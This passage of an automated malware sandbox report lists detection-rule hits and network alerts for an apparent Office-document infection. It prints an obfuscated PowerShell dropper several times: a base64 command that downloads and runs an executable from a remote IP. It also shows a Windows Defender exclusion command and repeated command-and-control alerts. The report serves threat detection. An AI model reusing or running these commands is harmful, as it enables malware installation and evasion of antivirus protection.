                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline", ProcessId: 3756, ProcessName: csc.exe
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 3868, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 3924, ProcessName: powershell.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3276, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", CommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgI
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\Temp\5dyke43n.e5i.ps1
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wininit.exe, NewProcessName: C:\Users\user\AppData\Roaming\wininit.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wininit.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 3868, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 3932, ProcessName: wininit.exe

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline", ProcessId: 3756, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:01.107297+010020241971A Network Trojan was detected66.63.187.23180192.168.2.2249163TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:01.107173+010020244491Attempted User Privilege Gain192.168.2.224916366.63.187.23180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:09.357697+010020220501A Network Trojan was detected66.63.187.23180192.168.2.2249164TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:09.456799+010020220511A Network Trojan was detected66.63.187.23180192.168.2.2249164TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:17.823731+010020243121A Network Trojan was detected192.168.2.224916594.156.177.4180TCP
                2024-11-20T11:08:18.691490+010020243121A Network Trojan was detected192.168.2.224916694.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:17.124071+010020253811Malware Command and Control Activity Detected192.168.2.224916594.156.177.4180TCP
                2024-11-20T11:08:17.934139+010020253811Malware Command and Control Activity Detected192.168.2.224916694.156.177.4180TCP
                2024-11-20T11:08:18.846126+010020253811Malware Command and Control Activity Detected192.168.2.224916794.156.177.4180TCP
                2024-11-20T11:08:19.737168+010020253811Malware Command and Control Activity Detected192.168.2.224916894.156.177.4180TCP
                2024-11-20T11:08:20.648933+010020253811Malware Command and Control Activity Detected192.168.2.224916994.156.177.4180TCP
                2024-11-20T11:08:21.561435+010020253811Malware Command and Control Activity Detected192.168.2.224917094.156.177.4180TCP
                2024-11-20T11:08:22.587777+010020253811Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T11:08:23.789922+010020253811Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                2024-11-20T11:08:24.629607+010020253811Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T11:08:25.550254+010020253811Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T11:08:26.451548+010020253811Malware Command and Control Activity Detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T11:08:27.342170+010020253811Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T11:08:28.290956+010020253811Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T11:08:29.162280+010020253811Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T11:08:30.056656+010020253811Malware Command and Control Activity Detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T11:08:30.942889+010020253811Malware Command and Control Activity Detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T11:08:31.861944+010020253811Malware Command and Control Activity Detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T11:08:32.814812+010020253811Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T11:08:33.725738+010020253811Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T11:08:34.631910+010020253811Malware Command and Control Activity Detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T11:08:35.612589+010020253811Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T11:08:36.666299+010020253811Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T11:08:37.600393+010020253811Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T11:08:38.858062+010020253811Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T11:08:39.816478+010020253811Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T11:08:40.691052+010020253811Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T11:08:41.600005+010020253811Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T11:08:42.470301+010020253811Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T11:08:43.523104+010020253811Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T11:08:44.560565+010020253811Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T11:08:45.440851+010020253811Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T11:08:46.326513+010020253811Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T11:08:47.362901+010020253811Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T11:08:48.429055+010020253811Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T11:08:49.331075+010020253811Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T11:08:50.269289+010020253811Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T11:08:51.465535+010020253811Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T11:08:52.406148+010020253811Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T11:08:53.449322+010020253811Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T11:08:54.344079+010020253811Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T11:08:55.469398+010020253811Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T11:08:56.364430+010020253811Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T11:08:57.229777+010020253811Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T11:08:58.136926+010020253811Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T11:08:59.170582+010020253811Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T11:09:00.196735+010020253811Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T11:09:01.097365+010020253811Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T11:09:01.972570+010020253811Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T11:09:02.864900+010020253811Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T11:09:03.749038+010020253811Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T11:09:04.621438+010020253811Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T11:09:05.555632+010020253811Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T11:09:06.505715+010020253811Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T11:09:07.388227+010020253811Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T11:09:08.631914+010020253811Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T11:09:09.510263+010020253811Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T11:09:10.381526+010020253811Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T11:09:11.269627+010020253811Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T11:09:12.154909+010020253811Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T11:09:13.118072+010020253811Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T11:09:14.021635+010020253811Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T11:09:15.054347+010020253811Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T11:09:15.957636+010020253811Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T11:09:16.974548+010020253811Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T11:09:17.855870+010020253811Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T11:09:19.681406+010020253811Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T11:09:20.573695+010020253811Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T11:09:21.471180+010020253811Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T11:09:22.364648+010020253811Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T11:09:23.410559+010020253811Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T11:09:24.567819+010020253811Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T11:09:26.583371+010020253811Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T11:09:27.798263+010020253811Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T11:09:28.872433+010020253811Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T11:09:29.853943+010020253811Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T11:09:30.933082+010020253811Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T11:09:31.828472+010020253811Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T11:09:32.713977+010020253811Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T11:09:33.926911+010020253811Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T11:09:34.827985+010020253811Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T11:09:35.811112+010020253811Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T11:09:36.907516+010020253811Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T11:09:37.827332+010020253811Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T11:09:38.717822+010020253811Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T11:09:39.652336+010020253811Malware Command and Control Activity Detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T11:09:40.609403+010020253811Malware Command and Control Activity Detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T11:09:41.549340+010020253811Malware Command and Control Activity Detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T11:09:42.611715+010020253811Malware Command and Control Activity Detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T11:09:43.638686+010020253811Malware Command and Control Activity Detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T11:09:44.672058+010020253811Malware Command and Control Activity Detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T11:09:45.977790+010020253811Malware Command and Control Activity Detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T11:09:47.076413+010020253811Malware Command and Control Activity Detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T11:09:48.084264+010020253811Malware Command and Control Activity Detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T11:09:48.976620+010020253811Malware Command and Control Activity Detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T11:09:49.991081+010020253811Malware Command and Control Activity Detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T11:09:50.896158+010020253811Malware Command and Control Activity Detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T11:09:51.906530+010020253811Malware Command and Control Activity Detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T11:09:53.992288+010020253811Malware Command and Control Activity Detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T11:09:55.237642+010020253811Malware Command and Control Activity Detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T11:09:56.312045+010020253811Malware Command and Control Activity Detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T11:09:57.430146+010020253811Malware Command and Control Activity Detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T11:09:58.398091+010020253811Malware Command and Control Activity Detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T11:09:59.662601+010020253811Malware Command and Control Activity Detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T11:10:00.565538+010020253811Malware Command and Control Activity Detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T11:10:01.472851+010020253811Malware Command and Control Activity Detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T11:10:02.341419+010020253811Malware Command and Control Activity Detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T11:10:03.579344+010020253811Malware Command and Control Activity Detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T11:10:04.613405+010020253811Malware Command and Control Activity Detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T11:10:05.653629+010020253811Malware Command and Control Activity Detected192.168.2.224927394.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T11:08:19.583567+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249167TCP
                2024-11-20T11:08:20.491622+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249168TCP
                2024-11-20T11:08:21.404863+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249169TCP
                2024-11-20T11:08:22.431805+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249170TCP
                2024-11-20T11:08:23.382907+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249171TCP
                2024-11-20T11:08:24.482563+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249172TCP
                2024-11-20T11:08:25.387666+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249173TCP
                2024-11-20T11:08:26.303597+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249174TCP
                2024-11-20T11:08:27.194081+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249175TCP
                2024-11-20T11:08:28.097656+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249176TCP
